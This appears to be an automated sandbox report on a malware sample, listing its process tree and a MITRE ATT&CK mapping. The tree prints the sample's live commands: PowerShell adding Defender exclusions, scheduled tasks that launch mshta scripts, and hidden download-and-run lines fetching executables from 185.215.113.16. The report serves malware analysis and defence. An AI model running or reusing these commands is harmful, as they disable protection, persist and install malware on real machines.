        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c powershell -NoProfile -ExecutionPolicy Bypass -Command "Add-MpPreference -ExclusionPath 'C:\NELKU'"
        7⤵
        
        PID:2672
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -NoProfile -ExecutionPolicy Bypass -Command "Add-MpPreference -ExclusionPath 'C:\NELKU'"
        8⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:2696
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c powershell -NoProfile -ExecutionPolicy Bypass -Command "Add-MpPreference -ExclusionPath 'C:\Users'"
        7⤵
        
        PID:2688
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -NoProfile -ExecutionPolicy Bypass -Command "Add-MpPreference -ExclusionPath 'C:\Users'"
        8⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:3016
      - C:\Users\Admin\AppData\Local\Temp\1073896001\ViGgA8C.exe
        
        "C:\Users\Admin\AppData\Local\Temp\1073896001\ViGgA8C.exe"
        6⤵
        Identifies VirtualBox via ACPI registry values (likely anti-VM)
        Checks BIOS information in registry
        Executes dropped EXE
        Identifies Wine through registry keys
        Suspicious use of NtSetInformationThreadHideFromDebugger
        System Location Discovery: System Language Discovery
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:432
      - C:\Users\Admin\AppData\Local\Temp\1073899001\51621402d0.exe
        
        "C:\Users\Admin\AppData\Local\Temp\1073899001\51621402d0.exe"
        6⤵
        Executes dropped EXE
        System Location Discovery: System Language Discovery
        Suspicious use of FindShellTrayWindow
        Suspicious use of SendNotifyMessage
        
        PID:2016
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c schtasks /create /tn KQmQ1ma8G5A /tr "mshta C:\Users\Admin\AppData\Local\Temp\4U53emrZY.hta" /sc minute /mo 25 /ru "Admin" /f
        7⤵
        System Location Discovery: System Language Discovery
        
        PID:2996
        
        C:\Windows\SysWOW64\schtasks.exe
        
        schtasks /create /tn KQmQ1ma8G5A /tr "mshta C:\Users\Admin\AppData\Local\Temp\4U53emrZY.hta" /sc minute /mo 25 /ru "Admin" /f
        8⤵
        System Location Discovery: System Language Discovery
        Scheduled Task/Job: Scheduled Task
        
        PID:2336
        
        C:\Windows\SysWOW64\mshta.exe
        
        mshta C:\Users\Admin\AppData\Local\Temp\4U53emrZY.hta
        7⤵
        System Location Discovery: System Language Discovery
        Modifies Internet Explorer settings
        
        PID:2236
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'CWBBYSCNGQZNIWVGMQQK6ESWMBLSBGJU.EXE';(New-Object System.Net.WebClient).DownloadFile('http://185.215.113.16/defend/random.exe',$d);Start-Process $d;
        8⤵
        Blocklisted process makes network request
        Command and Scripting Interpreter: PowerShell
        System Location Discovery: System Language Discovery
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:2648
      - C:\Windows\SysWOW64\cmd.exe
        
        cmd /c ""C:\Users\Admin\AppData\Local\Temp\1073900021\am_no.cmd" "
        6⤵
        System Location Discovery: System Language Discovery
        
        PID:3040
        
        C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\system32\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\1073900021\am_no.cmd" any_word
        7⤵
        System Location Discovery: System Language Discovery
        
        PID:2844
        
        C:\Windows\SysWOW64\timeout.exe
        
        timeout /t 2
        8⤵
        System Location Discovery: System Language Discovery
        Delays execution with timeout.exe
        
        PID:2300
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 9 | ForEach-Object {[char]$_})"
        8⤵
        System Location Discovery: System Language Discovery
        
        PID:2364
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 9 | ForEach-Object {[char]$_})"
        9⤵
        Command and Scripting Interpreter: PowerShell
        System Location Discovery: System Language Discovery
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:836
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 5 | ForEach-Object {[char]$_})"
        8⤵
        System Location Discovery: System Language Discovery
        
        PID:1868
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 5 | ForEach-Object {[char]$_})"
        9⤵
        Command and Scripting Interpreter: PowerShell
        System Location Discovery: System Language Discovery
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:2720
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 4 | ForEach-Object {[char]$_})"
        8⤵
        System Location Discovery: System Language Discovery
        
        PID:544
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 4 | ForEach-Object {[char]$_})"
        9⤵
        Command and Scripting Interpreter: PowerShell
        System Location Discovery: System Language Discovery
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:3056
        
        C:\Windows\SysWOW64\schtasks.exe
        
        schtasks /create /tn "YELK1majaen" /tr "mshta \"C:\Temp\HkjAswJ8a.hta\"" /sc minute /mo 25 /ru "Admin" /f
        8⤵
        System Location Discovery: System Language Discovery
        Scheduled Task/Job: Scheduled Task
        
        PID:1416
        
        C:\Windows\SysWOW64\mshta.exe
        
        mshta "C:\Temp\HkjAswJ8a.hta"
        8⤵
        System Location Discovery: System Language Discovery
        Modifies Internet Explorer settings
        
        PID:368
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'\483d2fa8a0d53818306efeb32d3.exe';(New-Object System.Net.WebClient).DownloadFile('http://185.215.113.16/mine/random.exe',$d);Start-Process $d;
        9⤵
        Blocklisted process makes network request
        Command and Scripting Interpreter: PowerShell
        Downloads MZ/PE file
        System Location Discovery: System Language Discovery
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:2508

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

Scheduled Task/Job

T1053

Scheduled Task

Persistence

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Scheduled Task/Job

T1053

Scheduled Task

Privilege Escalation

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Scheduled Task/Job

T1053

Scheduled Task

Defense Evasion

Modify Registry

Subvert Trust Controls

T1553

Install Root Certificate

T1553.004

Virtualization/Sandbox Evasion

Credential Access

Credentials from Password Stores

T1555

Credentials from Web Browsers

T1555.003

Unsecured Credentials

T1552

Credentials In Files

T1552.001

Discovery

Browser Information Discovery

T1217

Query Registry

System Information Discovery

T1082

System Location Discovery

T1614

System Language Discovery

T1614.001

Virtualization/Sandbox Evasion